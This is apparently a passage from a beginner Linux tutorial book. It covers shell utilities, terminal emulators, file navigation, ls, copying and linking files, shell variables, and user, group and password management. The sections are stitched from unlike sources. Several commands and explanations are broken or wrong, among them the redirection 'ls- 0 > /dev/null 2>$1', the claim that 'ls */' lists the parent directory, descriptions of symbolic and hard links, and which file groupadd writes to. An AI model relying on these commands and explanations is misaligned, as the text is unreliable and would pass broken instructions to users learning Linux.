false does nothing, comes out with a return code of 1 (error), can be used in shell scripts if an unsuccessful command is being attempted; true does nothing, comes out with a return code of 0 (successful completion), can be used in scripts if a successful command is required; yes infinitely prints the same line (by default, yes) until it is interrupted. seq displays a series of numbers in a given range of successively increasing or decreasing by a specified amount; sleep suspends execution for a specified number of seconds; usleep suspends execution for a specified number of milliseconds; comm compares 2 pre-sorted (by the sort command) files line by line, displays a table of three columns, where in the first are lines unique to the first file, in the second are unique to the second, in the third they are common to both files; join combines lines of two files on a common field; paste For each pair of input lines with the same common fields, print the line to standard output. By default, the general field is considered first, the fields are separated by whitespace. split splits the file into pieces of a given size. Calculations In addition to simple operations with strings (input/output and merging), it is

often necessary to perform some calculations on the available data. Listed below are utilities that perform calculations on numbers, dates, strings. test returns true or false depending on the value of the arguments; The test command is useful in scripts to check conditions; date displays and sets the system date, in addition, it can be used for calculations over dates; expr evaluates expressions; md5sum calculates checksum using MD5 algorithm; sha1sum calculates checksum using SHA1 algorithm; wc counts the number of lines, words, and characters in the file; factor decomposes numbers into prime factors; Search The search for information in the file system can be divided into a search by file attributes (understanding them extensively, that is, including the name, path, etc.) and content search. For these types of search, the programs find and grep are usually used, respectively. Thanks to convenient interprocess communication tools, these two types of search are easy to combine, that is, to search for the necessary information only in files with the necessary attributes. Attribute search

The main search tool for file attributes is the find program. A generalized call to find looks like this: find path expression, where path is a list of directories in which to search, and expression is a set of expressions that describe the criteria for selecting files and the actions to be performed on the files found. By default, the names of found files are simply output to standard output, but this can be overridden and the list of names of found files can be transferred to any command for processing. By default, find searches in all subdirectories of directories specified in the path list.

Expressions Expressions that define file search criteria consist of key-value pairs. Some of the possible search options are listed below: -amin, -anewer, -atime The time of the last access to the file. Allows you to search for files that were opened for a certain period of time, or vice versa, for files that nobody has accessed for a certain period. -cmin, -cnewer, -ctime The time the file was last changed. -fstype The type of file system on which the file is located. -gid, -group User and group that owns the file. -name, -iname Match the file name to the specified pattern. -regex, -iregex Match the file name to a regular expression. -path, -ipath Match the full file name (with the path) to the specified pattern. -perm

Access rights. -size File size. -type File type. Actions The find program can perform various actions on the found files. The most important of them are: -print Output the file name to the standard output (the default action); -delete delete a file; -exec execute the command by passing the file name as a parameter. You can read about the rest in the on-screen documentation for the find command, by issuing the man find command.

Options Parameters affect the overall behavior of find. The most important of them are: -maxdepth maximum search depth in subdirectories; -mindepth minimum search depth in subdirectories; -xdef Search only within the same file system. You can read about the rest in the on-screen documentation for the find command.

Terminals The terminal in Linux is a program that provides the user with the ability to communicate with the system using the command line interface. Terminals allow you to transfer to the system and receive only text data from it. The standard terminal for the Linux system can be obtained on any textual virtual console, and in order to access the command line from the graphical shell, special programs are needed: terminal emulators. Listed below are some of the terminal emulators and similar programs included in the ALT Linux 2.4 Master distribution. xterm Programs: resize, uxterm, xterm. Standard terminal emulator for the X Window System. This emulator is compatible with DEC VT102 / VT220 and Tektronix 4014 terminals and is designed for programs that do not use the graphical environment directly. If the operating system supports changing the terminal window (for example, a SIGWINCH signal on systems that have gone from 4.3bsd), xterm can be used to inform programs running on it that the window size has changed. aterm Aterm is a color emulator of the terminal rxvt version 2.4.8, supplemented with NeXT-style scroll bars by Alfredo Kojima. It is intended to replace the xterm if you do not need a Tektronix 4014 terminal emulation. console-tools Programs: charset, chvt, codepage, consolechars, convkeys, deallocvt, dumpkeys, fgconsole, "" setkeycodes, setleds, setmetamode, setvesablank, showcfont, showkey, splitfont, unicode_stop, vcstime, vt-is-UTF8, writevt. This package contains tools for loading console fonts and keyboard layouts. It also includes a variety of fonts and layouts. In case it is installed, its tools are used during boot / login to establish the system / personal configuration of the console. screen The screen utility allows you to execute console programs when you cannot control their execution all the time (for example, if you are limited to session

access to a remote machine). For example, you can perform multiple interactive tasks on a single physical terminal (remote access session) by switching between virtual terminals using a screen installed on a remote machine. Or this program can be used to run programs that do not require direct connection to the physical terminal. Install the screen package if you may need virtual terminals. vlock The vlock program allows you to block input when working in the console. Vlock can block the current terminal (local or remote) or the entire system of virtual consoles, which allows you to completely block access to all consoles. Unlocking occurs only after successful authorization of the user who initiated the console lock.

Chapter 8 Basic Linux Shell Commands Introduction We are not going to look at some useful commands for file handling and similar uses. Before going into more details, let’s look at the Linux file structure. Linux stores files in a structure known as the virtual directory structure. This is a single directory structure. It incorporates all the storage devices into a single tree. Each storage device is considered as a file. If you examine the path of a file, you do not see the disk information. For instance, the path to my desktop is, /home/jan/Desktop. This does not display any disk information in its path. By this way, you do not need to know the underlying architecture. If you are to add another disk to the existing, you simply use mount point directories to do so. Everything is connected to the root. These files naming is based on the FHS (Filesystem Hierarchy Standard). Let’s look at the common files once more. We already went through the directory types during the installation. Table: Linux directory types Directory

Purpose

/

This is the root home directory. The upper-most level.

/bin

This is the binary store. GNU utilities (user-level) exist in this directory.

/boot

This is where the system stores the boot directory and files used during the boot process.

/dev

Device directory and nodes.

/etc

This is where the system stores the configuration files.

/home

Home of user directories.

/lib

System and application libraries.

/media

This is where media is mounted, media such as CDs, USB drives.

/mnt

Where the removable media is mounted to.

/opt

Optional software packages are stored here.

/proc

Process information – not open for users.

/root

Home directory of root.

/run

Runtime data is stored here.

/sbin

System binary store. Administrative utilities are stored here.

/srv

Local services store their files here.

/sys

System hardware information is stored here.

/tmp

This is the place for temporary files.

/usr

This is where the user-installed software are stored.

/var

Variable director where the dynamic files such as logs are stored.

Directory and File Navigation To view a list of directories in the present directory, in Windows you use the dir command. This command works the same way on Linux. To navigate to files, the most basic method is to use the full path to the file such as /home/jan/Desktop/. There are basic commands to do this with easier. 1. Know your present working directory with pwd command.

Change the directory location using the cd command. Here we use the absolute path.

2. Get back to the home directory using the cd command only.

Now we will use the relative path to make things easier and less timeconsuming. In this case, we can use the ‘/’.

Here, the dir command lists directories under my current folder. I could jump to desktop folder using the command cd Desktop. There are 2 special characters when it comes to directory traversal. Those are ‘.’ And ‘..’. Single dot represents the current directory. Double dots represent the upper folder. 5. To go back to one level up, use the ‘..’ for instance

6. You can also use ‘..’ to skip typing folder paths. For instance, 7. You can go back one level and go forward. Here, you go up to the home folder and then go forward (down) to the Music folder.

8. You can do the ‘../’ in a chain to go to a folder in an upper level, back and forth using absolute path (mixing relative and absolute paths).

Listing Files We use ls command to list files. This is one of the most popular

commands among Linux users. Below is a list of ls commands and their use. ls- a ls --color ls -d ls -F ls -i ls -l ls- la ls -lh ls -ls ls -r ls -R ls -s ls -S ls -t ls -X

List all files including all the hidden files starting with ‘.’ Colored list [=always/never/auto] List the directories with ‘*/’ Append indicator to entries (such as one of */=>@|) Lists the inode index List with long format including permissions Same as above with hidden files The long list with human readable format The long list with file size Long list in reverse List recursively (the directory tree) List file size List by size Sort by date/time Sort by extension name

Let’s examine a few commands. Remember, you can use more than one argument. E.g., ls -la Syntax: ls [option ...] [file]... Detailed syntax: ls [-a | --all] [-A | --almost-all] [--author] [-b | --escape] [--block-size=size] [-B | --ignore-backups] [-c] [-C] [--color[=when]] [-d | --directory] [-D | --dired] [-f] [-F | --classify] [--file-type] [--format=word] [--full-time] [-g] [--group-directories-first]

[-G | --no-group] [-h | --human-readable] [--si] [-H | --dereference-command-line] [--dereference-command-line-symlinkto-dir] [--hide=pattern] [--indicator-style=word] [-i | --inode] [-I | --ignore=pattern] [-k | --kibibytes] [-l] [-L | --dereference] [-m] [-n | --numeric-uid-gid] [-N | --literal] [-o] [-p | --indicator-style=slash] [-q | --hide-control-chars] [--show-control-chars] [-Q | --quote-name] [--quoting-style=word] [-r | --reverse] [-R | --recursive] [-s | --size] [-S] [--sort=word] [--time=word] [--time-style=style] [-t] [-T | --tabsize=cols] [-u] [-U] [-v] [-w | --width=cols] [-x] [-X] [-Z | --context] [-1] Example: ls -l setup.py

This gives long list style details for this specific file. More examples List content of your home directory: ls Lists content of your parent directory: ls */ Displays directories of the current directory: ls -d */ Lists the content of root: ls / Lists the files with the following extensions: ls *.{htm,sh,py} Lists the details of a file. If not found suppress the errors: ls -myfile.txt 2>/dev/null A word on /dev/null /dev/null is an important location. This is actually a special file called the null device. There are other names, such as blackhole or bit-bucket. When something is written to this file, it immediately discards it and returns and end-of-file (EOF). When a process or a command returns an error STDERR or the standard error is the default file descriptor a process can write into. These errors will be displayed on screen. If someone wants to suppress it, that is where the null

device becomes handy. We often write this command line as /dev/null 2>&1. For instance, ls- 0 > /dev/null 2>$1 What does it mean by 2 and $1. The file descriptors for Standard Input (stdin) is 0. For Standard Output (stdout), it is 1. For Standard Error (stderr) it is 2. Here, we are suppressing the error generated by the ls command. It is redirected to stdout and then writing it to the /dev/null thus discarding it immediately. ls Color Codes

ls color codes These color codes distinguish the file types quite well Let’s run ls -lasSt

This uses a long list format, displays all files, sorts by time. Now, you need to understand what these values are.

1. 4: File size (sorted by size). 2. In the next section d is for directory. 3. The next few characters represent permissions (r-read, w-write, x-execute). 4. Number of hard links. 5. File owner. 6. File owner’s group. 7. Byte size. 8. Last modified time (sort by). 9. File/Directory name. If you use -i in the command (S is removed, sorted by last modified time). You see the nodes in the left most area.

Example: ls -laxo

Using ls for Pattern Matching The ls command can be used in conjunction with wildcards such as ‘*’ and ‘?’ Here the ‘*’ represents multiple characters and ‘?’ represents a single character. In this example, we have the following folder with the following directories and files.

We are trying to find a file with the name vm* (vm and any characters to the right). And then we will try to match the INSTALL name of the file. In the first attempt it fails as there 4 ‘?’s. The next one succeeds.

We will now use the or logic to match a pattern.

Image: Folders in my directory Let’s see if we can only list the directories with the characters a and i in the middle.

Another example using pipes: ls -la | less

Handling Files In this section, we will create, modify, copy, move and delete files. You will also learn how to read files and do other tasks. Creating a File To create files and to do some more tasks we use the command touch. touch test.txt

Syntax: touch [OPTION]... FILE... Detailed syntax: touch [[-a] [-m] | [--time=timetype] [...]] [[-d datestring] | [-t timestamp]] [-c] [-f] [-h] [-r reffile] file [file ...] This command can also be used to change the file access time of a file.

To change only the last access time, use -a. Example: touch -a test1.txt

Here, to view the output you use –time parameter in the ls command. With

only the ls -l it does not display the last access time but the last modified time. Copying Files To copy files, use the cp command. Syntax: cp [option]... [-T] source destination Example: cp test1.txt test2.txt

Copy command can be dangerous as it does not ask if test2.txt exists. It leads to a data loss. Therefore, always use -i option.

You can answer with y or n to accept or deny. Copying a file to another directory: cp test1.txt /home/jan/Documents

Using relative path instead the absolute path. Now I am at the following directory: /home/jan/Desktop. I want to copy a file to /home/jan/Documents Command: cp test1.txt ../Documents

Copy a file to the present working directory using the relative path. Here we will use ‘.’ to denote the pwd.

Recursively copy files and folders Example: cp -R copies the folder snapt with files to snipt.

Let’s copy a set of files recursively from one directory to its sub directory. Command: cp -R ./Y/snapt/test* ./Y/snopt

This is my desktop. I have these files in the Y directory on Desktop. I want to copy test1.txt and test2.txt from Y to snopt directory. After executing the command,

How to use wildcards? We already used it in this example, haven’t we?

Linking Files with Hard and Symbolic Links Another feature of the Linux file system is the ability to link files. Without maintaining original copies of files everywhere, you can link files to keep virtual copies of the same file. You can think of a link as a placeholder. There are 2 types of links, Symbolic links -

Hard links

A symbolic link is another physical file. It is not a shortcut. This file is linked to another file in the file system. Unlike a shortcut, the symlink gets instant access to the data object. Syntax: ln -s [OPTIONS] FILE LINK

Example: ln -s ./Y/test1.txt testn.txt

If you check the inode you will see these are different files. The size can tell the same difference. -

279185 test1.txt 1201056 testn.txt

When you create symlinks, the destination file should not be there (especially directory with the destination symlink name should not be there). However, you can force the command to create or replace the file.

The ln command is also valid for directories.

If you wish to overwrite symlinks, you have to use the -f as stated above. Or else, if you want to replace the symlink from a file to another, use -n. Example: I have 2 directories dir1 and dir2 on my desktop. I create a symlink - dir1 to sym. Then I want to link sym to dir 2 instead. If I use -s and -f together (-sf) it does not work. The option to us here is -n.

Unlinking To remove the symlinks you can use the following commands. -

Syntax: unlink linkname Syntax: rm linkname Creating Hard Links

Now we will look at creating hard links. Hard link creates a separate virtual file. This file includes information about the original file and its location. Example: ln test1.txt hard_link

Here we do not see any symbolic representations. That means the file is an actual physical file. And if you look at the inode, you will see both files having the same inode number.

How do we identify a hard link? Usually the files connected to a file is 1. In other words, itself. If the number is 2, that means it has a connection to another file. Another example,

Symbolic link does not change this increment of hard link number for each file. See the following example.

What happens if the original file is removed?

Now here you can see the hard_link has reduced to its links to 1. The

symbolic link displays a broken or what we call the orphan state.

File Renaming Next, we will look at how file renaming works. For this the command used is mv. mv stands for “move”. Syntax: mv [options] source dest Example: mv LICENSE LICENSE_1 You must be cautious when you use this command. If you do the following, what would happen?

One advantage of this command is that you can move and rename the file all together, especially when you do it from one location to another. Example: Moving /home/jan/Desktop/Y/snapt to /Desktop while renaming it so Snap. This is similar to a cut and paste on Windows except for the renaming part. Example: mv /home/jan/Desktop/Y/snapt/ ./Snap

Removing Files To remove files, use rm command. rm command does not ask you if you want to delete the file. Therefore, you must use the -i option with it. Syntax: rm [OPTION]... FILE...

Managing Directories There is a set of commands to create and remove directories. To create a directory, use the mkdir command. To remove a directory, use the rmdir command. Syntax: mkdir [-m=mode] [-p] [-v] [-Z=context] directory [directory ...] rmdir [-p] [-v | –verbose] [–ignore-fail-on-non-empty] [directories …] Example: Creating a set of directories with the mkdir command. To create a tree of directories you must use -p. If you try without it, you won’t succeed.

Command: mkdir -p ./Dir1/Dir1_Child1/Child1_Child2 Example: rmdir ./Dir1/Dir1_Child1/Child1_Child2 To remove a directory with the rmdir command is not possible if the directory has files in it.

You have to remove the files first in order to remove the directory. In this case, you can use another command to do this recursively. Example: rm -rf /Temp

Managing File Content File content management is extremely useful for day to day work. You can use several commands to view and manage content. Let’s look at the file command first. It helps us to have a peak into the file

and see what it actually is. It can do more. -

This command provides an overview of the file.

-

It tells you if the file is a directory.

It tells you if the file is a symbolic link. It can display file properties especially against binary executables (a secure operation). It may brief you about the content (i.e., when executed against a script file). Syntax: file [option] [filename]

Viewing Files with cat Command To view files, you cannot use the file command. You can use a more versatile command known as cat. Syntax: cat [OPTION] [FILE]... This command is an excellent tool to view a certain file or files at once, parts of the files and especially logs. Example: cat test.txt

Example: Viewing 2 files together. Command: cat test.txt testx.txt

Creating files with cat is also possible. The following command can create a file. Example: cat >testy

The cat command can be used with 2 familiar commands we used earlier. The less and more commands. Example: cat test.txt | more

Example: cat test.txt | less

Example: Displaying a line number with cat. Command: cat -n testx.txt

Overwriting the Files with cat - You can use the redirection (standard input) operator (>). The following command will overwrite the text file. This is a useful tool, but you have to use it with caution. This can be performed for multiple files to obtain a single file. Example: cat test.txt > testx.txt Appending file content with cat without overwriting – Since the previous command causes overwriting, it cannot be used if you are willing to append a content from one file to another. Example: cat textx.txt >> testy.txt

Example: Using standard input with cat. Command: cat < testy

Using head and tail commands By default, the head command displays 10 lines from the top and tail command displays the 10 lines from the bottom. Examples: -

head testy

-

tail testy

-

head -2 testy

-

tail -2 testy

Chapter 9 Variables The echo command is used in printing out the values present inside the variables. In Linux, creation of variables is very easy. For example, in order to store a name, John into a variable name, you can do something similar to what’s being shown below: [[email protected] ~]# name="John" The double quotation marks tell Linux that you are creating a variable which will hold string typed value: John. If your string contains only one word then you can ignore the quotation marks, but if you are storing a phrase that contains more than one word and whitespaces than you must use the double quotation marks. To see the value inside any variable, you have to use the dollar sign ($) before mentioning the name of the variable in the echo command. Like this: [[email protected] ~]# echo $name John If you miss the dollar sign ($), echo will treat the argument passed to it as a string and will print that string for example: [[email protected] ~]# echo name name You should keep in mind that there should not be any white spaces present between the identifier of the variable and its value. An identifier is basically the name or signature of a variable: [[email protected] ~]# x=5 # This syntax is correct because there aren’t any whitespaces [[email protected] ~]# x = 10 # This syntax is incorrect because whitespaces are #present between the variable name and its value If you want to store some value inside a file whilst using the echo command, you could do something like this: [[email protected] NewFolder]# echo name > new.txt [[email protected] NewFolder]# cat new.txt name

In the example above, I am storing a string name into a file that I created. After storing the text in the file, I printed it on the terminal and got exactly what I stored in the text file. In the following set of commands, I am using double >> signs to append new text in the existing file. [[email protected] NewFolder]# echo "is something that people use to recognize you!" >> new.txt [[email protected] NewFolder]# cat new.txt name is something that people use to recognize you! You can also create and print two variables with a single line of command each, respectively. Example: [[email protected] ~]# x=1; y=2 [[email protected] ~]# echo -e "$x\t$y" 12 [[email protected] ~]# echo -e "$x\n$y" 1 2 The flag –e tells Linux that I am going to use an escape character whilst printing the values of my variable. The first echo command in the example above contains the \t escape character, which means that a tab of space should be added whilst printing the values of variables passed. The second echo command also contains an escape character of new line: \n. This escape character will print a new line between the values of two variables, as it is shown in the aforementioned example. There are other escape sequences present in Linux terminal as well. For example, in order to print a back slash as part of your string value, you must use double back slash in your echo command: [[email protected] ~]# echo -e "$x\\$y" 1\2 There are other variables present in the Linux too, there variables store some

values that come in handy whilst using any distribution of Linux. These predefined variables are often referred to as global variables. For example, $HOME is one of those global variable. The $HOME variable stores the path of our default directory, which in our case is the HOME folder. We can see the path stored in the $HOME folder using the echo command: [[email protected] ~]# echo $HOME /root We can also change the values of these global variables, using the same method that I used to store Value into a newly created variables. For now, I would ask you not to try that, as these kind of things only concern expert Linux users, which you are not right now, but soon you will be. Other global variables are: 1. PATH 2. PS1 3. TMPDIR 4. EDITOR 5. DISPLAY Try echoing there values, but don’t change them, as they will affect the working of your Linux Installation: [[email protected] ~]# echo $PS1 [\[email protected]\h \W]\$ [[email protected] ~]# echo $EDITOR [[email protected] ~]# echo $DISPLAY :1 [[email protected] ~]# echo $TMPDIR The most important global variable of all is the $PATH variable. The $PATH variable contains the directories / locations of all the programs that you can use from any directory. $PATH is similar to the environment variables present in the WINDOWS operating system. Both hold the directory paths to the programs. Let’s print the $PATH variable. Our outputs might differ so

don’t worry if you see something different: Example: [[email protected] ~]# echo $PATH

Output: /usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core The output of the example above shows the path where Linux can find files related to site_perl, vendor_perl or core_perl. You can add values to the path variable too. But again, at this stage you shouldn’t change any value present in the $PATH variable. If you want to see where the commands that you use, reside in the directory structure of Linux, you should use the which command. It will print out the directory from where Linux is getting the definition of a command passed. Example: [[email protected] ~]# which ls /usr/bin/ls [[email protected] ~]# which pwd /usr/bin/pwd [[email protected] ~]# which cd

which: no cd in (/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/cor [[email protected] ~]# which mv /usr/bin/mv

Chapter 10 User and Group Management In this chapter, we will learn about users and groups in Linux and how to manage them and administer password policies for these users. By the end of this chapter, you will be well versed with the role of users and groups on a Linux system and how they are interpreted by the operating system. You will learn to create, modify, lock and delete user and group accounts, which have been created locally. You will also learn how to manually lock accounts by enforcing a password-aging policy in the shadow password file. Users and Groups In this section, we will understand what users and groups are and what is their association with the operating system. Who is a user? Every process or a running program on the operating system runs as a user. The ownership of every file lies with a user in the system. A user restricts access to a file or a directory. Hence, if a process is running as a user, that user will determine the files and directories the process will have access to. You can know about the currently logged-in user using the id command. If you pass another user as an argument to the id command, you can retrieve basic information of that other user as well. If you want to know the user associated with a file or a directory, you can use the ls -l command and the third column in the output shows the username. You can also view information related to a process by using the ps command. The default output to this command will show processes running only in the current shell. If you use the ps a option in the command, you will get to see all the process across the terminal. If you wish to know the user associated with a command, you can pass the u option with the ps command and the first column of the output will show the user. The outputs that we have discussed will show the users by their name, but the system uses a user ID called UID to track the users internally. The usernames are mapped to numbers using a database in the system. There is a flat file stored at /etc/passwd, which stored the information of all users. There are seven fields for every user in this file.

username: password:UID:GID:GECOS:/home/dir:shell username: Username is simply the pointing of a user ID UID to a name so that humans can retain it better. password: This field is where passwords of users used to be saved in the past, but now they are stored in a different file located at /etc/shadow UID: It is a user ID, which is numeric and used to identify a user by the system at the most fundamental level GID: This is the primary group number of a user. We will discuss groups in a while GECOS: This is a field using arbitrary text, which usually is the full name of the user /home/dir: This is the location of the home directory of the user where the user has their personal data and other configuration files shell: This is the program that runs after the user logs in. For a regular user, this will mostly be the program that gives the user the command line prompt What is a group? Just like users, there are names and group ID GID numbers associated with a group. Local group information can be found at /etc/group There are two types of groups. Primary and supplementary. Let’s understand the features of each one by one. Primary Group: There is exactly one primary group for every user The primary group of local users is defined by the fourth field in the /etc/passwd file where the group number GID is listed

New files created by the user are owned by the primary group The primary group of a user by default has the same name as that of the user. This is a User Private Group (UPG) and the user is the only member of this group Supplementary Group: A user can be a member of zero or more supplementary groups The primary group of local users is defined by the last field in the /etc/group file. For local groups, the membership of the user is identified by a comma separated list of user, which is located in the last field of the group’s entry in /etc/group groupname: password:GID:list, of, users, in, this, group The concept of supplementary groups is in place so that users can be part of more group and in turn have to resources and services that belong to other groups in the system Getting Superuser Access In this section, we will learn about what the root user is and how you can be the root or superuser and gain full access over the system. The root user There is one user in every operating system that is known as the super user and has all access and rights on that system. In a Windows based operating system, you may have heard about the superuser known as the administrator. In Linux based operating systems, this superuser is known as the root user. The root user has the power to override any normal privileges on the file system and is generally used to administer and manage the system. If you want to perform tasks such as installing new software or removing an existing software, and other tasks such as manage files and directories in the system, a user will have to escalate privileges to the root user. Most devices on an operating system can be controlled only by the root user, but there are a few exceptions. A normal user gets to control removable devices such as a USB drive. A non-root user can, therefore, manage and remove files on a removable device but if you want to make modifications to a fixed hard drive, that would only be possible for a root user.

But as we have heard, with great power comes great responsibility. Given the unlimited powers that the root user has, those powers can be used to damage the system as well. A root user can delete files and directories, remove or modify user accounts, create backdoors in the system, etc. Someone else can gain full control over the system if the root user account gets compromised. Therefore, it is always advisable that you login as a normal user and escalate privileges to the root user only when absolutely required. The root account on Linux operating system is the equivalent of the local Administrator account on Windows operating systems. It is a practice in Linux to login as a regular user and then use tools to gain certain privileges of the root account. Using Su to Switch Users You can switch to a different user account in Linux using the su command. If you do not pass a username as an argument to the su command, it is implied that you want to switch to the root user account. If you are invoking the command as a regular user, you will be prompted to enter the password of the account that you want to switch to. However, if you invoke the command as a root user, you will not need to enter the password of the account that you are switching to. su - [[email protected] ~]$ su Passord: rootpassword [[email protected] ~]# If you use the command su username, it will start a session in a non-login shell. But if you use the command as su - username, there will be a login shell initiated for the user. This means that using su - username sets up a new and clean login for the new user whereas just using su username will retain all the current settings of the current shell. Mostly, to get the new user’s default settings, administrators usually use the su - command. sudo and the root There is a very strict model implemented in linux operating systems for users. The root user has the power to do everything while the other users can do nothing that is related to the system. The common solution, which was

followed in the past was to allow the normal user to become the root user using the su command for a temporary period until the required task was completed. This, however, has the disadvantage that a regular user literally would become the root user and gain all the powers of the root user. They could then make critical changes to the system like restarting the system and even delete an entire directory like /etc. Also, gaining access to become the root user would involve another issue that every user switching to the root user would need to know the password of the root user, which is not a very good idea. This is where the sudo command comes into the picture. The sudo command lets a regular user run command as if they are the root user, or another user, as per the settings defined in the /etc/sudoers file. While other tools like su would require you to know the password of the root user, the sudo command requires you to know only your own password for authentication, and not the password of the account that you are trying to gain access to. By doing this, it allows the administrator of the system to allow a certain list of privileges to regular users such that they perform system administration tasks, without actually needing to know the root password. Lets us see an example where the student user through sudo has been granted access to run the usermod command. With this access, the student user can now modify any other user account and lock that account [[email protected] ~]$ sudo usermod -L username [sudo] password for student: studentpassword Another benefit of using the sudo access is that all commands that any user runs using sudo are logged to /var/log/secure. Managing User Accounts In this section, you will learn how to create, modify, lock and delete user accounts that are defined locally in the system. There are a lot of tools available on the command line, which can be invoked to manage local user accounts. Let us go through them one by one and understand what they do. useradd username is a command that creates a new user with the username that has been specified and creates default parameters for the user in the /etc/passwd file when the command is run without using an

option. Although, the command will not set any default password for the new user and therefore, the user will not be able to login until a password has been set for them. The useradd --help will give you a list of options that can be specified for the useradd command and using these will override the default parameters of the user in the /etc/passwd file. For a few options, you can also use the usermod command to modify existing users. There are certain parameters for the user, such as the password aging policy or the range of the UID numbers, which will be read from the /etc/login.defs file. The file only comes into picture while creating new users. Modifying this file will not make any changes to existing users on the system. ● usermod --help will display all the basic options that you can use with this command, which can be used to manage user accounts. Let us go through these in brief -c, --comment COMMENT

This option is used to add a value such as full name to the GECOS field

-g, --gid GROUP

The primary group of the user can be specified using this option

-G, --groups GROUPS

Associate one or more supplementary groups with user

-a, --append

The option is used with the -G option to add the user to all specified supplementary groups without removing the user from other groups

-d, --home HOME_DIR

The option allows you to modify a new home directory for the user

-m, --move-home

You can move the location of the user’s home directory to a new location by using the -d option

-s, --shell SHELL

The login shell of the user is changed using this option

-L, --lock

Lock a user account using this option

-U, --unlock

Unlock a user account using this option

● userdel username deletes the user from the /etc/passwd file but does not delete the home directory of that user. userdel -r username deletes the user from /etc/passwd and deletes their home directory along with its content as well. ● id displays the user details of the current user, which includes the UID of the user and group memberships. id username will display the details of the user specified, which includes the UID of the user and group memberships. ● passwd username is a command that can be used to set the user’s initial password or modify the user’s existing password. The root user has the power to set the password to any value. If the criteria for password strength is not met, a warning message will appear, but the root user can retype the same password and set the password for a given user anyway. If it is a regular user, they will need to select a password, which is at least 8 characters long, should not be the same as the username, or a previous word, or a word that can be found in the dictionary. ● UID Ranges are ranges that are reserved for specific purposes in Red Hat Enterprise Linux 7 UID 0 is always assigned to the root user. UID 1-200 are assigned by the system to system processes in a static manner. UID 201-999 are assigned to the system process that does not own any file in the system. They are dynamically assigned whenever an installed software request for a process. UID 1000+ are assigned to regular users of the system.

Managing Group Accounts In this section, we will learn about how to create, modify, and delete group accounts that have been created locally. It is important that the group already exists before you can add users to a group. There are many tools available on the Linux command line that will help you to manage local groups. Let us go through these commands used for groups one by one. ● groupadd groupname is a command that if used without any options creates a new group and assigns the next available GID in the group range and defines the group in the /etc/login.defs file You can specify a GID by using the option -g GID [[email protected] ~]$ sudo groupadd -g 5000 ateam The -r option will create a group that is system specific and assign it a GID belonging to the system range, which is defined in the /etc/login.defs file. [[email protected] ~]$ sudo groupadd -r professors ● groupmod command is used to modify the parameters of an existing group such as changing the mapping of the groupname to the GID. The -n option is used to specify a new name to the group. [[email protected] ~]$ sudo groupmod -n professors lecturers The -g option is passed along with the command if you want to assign a new GID to the group. [[email protected] ~]$ sudo groupmod -g 6000 ateam ●

groupdel command is used to delete the group.

[[email protected] ~]$ sudo groupdel ateam Using groupdel may not work on a group that is the primary group of a user. Just like userdel, you need to be careful with groupdel that you check that there are no files on the system owned by the user existing after deleting the group. ● usermod command is used to modify the membership of a user to a group. You can use the command usermod -g groupname to achieve the

same. [[email protected] ~]$ sudo usermod -g student student You can add a user to the supplementary group using the usermod -aG groupname username command. [[email protected] ~]$ sudo usermod -aG wheel student Using the -a option ensures that modifications to the user are done in append mode. If you do not use it, you will be removed from all other groups and be only added to the new group. User Password Management In this section, we will learn about the shadow password file and how you can use it to manually lock accounts or set password-aging policies to an account. In the initial days of Linux development, the encrypted password for a user was stored in the file at /etc/passwd, which was world-readable. This was tested and found to be a secure path until attackers started using dictionary attacks on encrypted passwords. It was then that it was decided to move the location of encrypted password hash to a more secure location, which is at /etc/shadow file. The latest implementation allows you to set password-aging policies and expiration features using this new file. The modern password hash has three pieces of information in it. Consider the following password hash: $1$gCLa2/Z$6Pu0EKAzfCjxjv2hoLOB/ 1: This part specifies the hashing algorithm used. The number 1 indicates that an MD5 hash has been implemented. The number 6 comes into the hash when a SHA-512 hash is used. gCLa2/Z: This indicates the salt used to encrypt the hash. It is a randomly chosen salt at first. The combination of the unencrypted password and salt together form the encrypted hash. The advantage of having a salt is that two users who may be using the same password will not have identical hash entries in the /etc/shadow file. 6Pu0EKAzfCjxjv2hoLOB/: This is the encrypted hash. In the event of a user trying to log in to the system, the system looks up for their entry in the /etc/shadow file. It then combines the unencrypted password entered by the user with the salt for the user and uses the hash algorithm

specified to encrypt this combination. It is implied that the password typed by the user is correct of this hash matches with the hash in the /etc/shadow file. Otherwise, the user has just typed in the wrong password and their login attempt fails. This method is secure as it allows the system to determine if a user typed in the correct password without having to store the actual unencrypted password in the file system. The format of the /etc/shadow file is as below. There are 9 fields for every user as follows. name:password:lastchange:minage:maxage:warning:

inactive:

name: This needs to be a valid username on a particular system through which a user logs in. password: This is where the encrypted password of the user is stored. If the field starts with an exclamation mark, it means that password is locked. lastchange: This is the timestamp of the last password change done for the account. minage: This defines the minimum number of days before a password needs to be changed. If it is the number 0, it means there is no minimum age for the account. maxage: This defines the maximum number of days before a password needs to be changed. warning: This is a warning period that shows that the password is going to expire. If the number is 0, it means that no warning will be given before password expiry. inactive: This is the number of days after password expiry the account will stay inactive. During this, the user can use the expired password and still log into the system to change his password. If the user fails to do so in the specified number of days for this field, the account will get locked and become inactive. expire: This is the date when the account is set to expire. blank: This is a blank field, which is reserved for future use. Password Aging Password aging is a technique that is employed by system administrators to safeguard bad passwords, which are set by users of an organization. The

expire:

policy will basically set a number of days, which is 90 days by default after, which a user will be forced to change their password. The advantage of forcing a password change implies that even if someone has gained access to a user’s password, they will have it with them only for a limited amount of time. The con to this approach is that users will keep writing their password in some place since they can’t memorize it if they keep changing it. In Red Hat Enterprise Linux 7, there are two ways through, which password aging can be enforced. 1. Using the chage command on the command line 2. Using the User Management application in the graphical interface The chage command with the -M option lets a system admin specify the number of days for, which the password is valid. Let us look at an example. [[email protected] ~]$ sudo chage -M 90 alice In this command, the password validity for the user alice will be set to 90 days after, which the user will be forced to reset their password. If you want to disable password aging, you can specify the -M value as 9999, which is equivalent to 273 years. You can set password aging policies by using the graphical user interface as well. There is an application called User Manager, which you can access from the Main Menu Button > System Settings > Users & Groups. Alternatively, you can type the command system-config-users in the terminal window. The User Manager window will pop up. Navigate to the Users tab, select the required user from the list, and click on the Properties button where you can set the password aging policy. Access Restriction You can set the expiry for an account using the chage command. The user will not be allowed to login to the system once that date is reached. You can use the usermod command with the -L option to lock a particular user account. [[email protected] ~]$ sudo usermod -L alice [[email protected] ~]$ su - alice

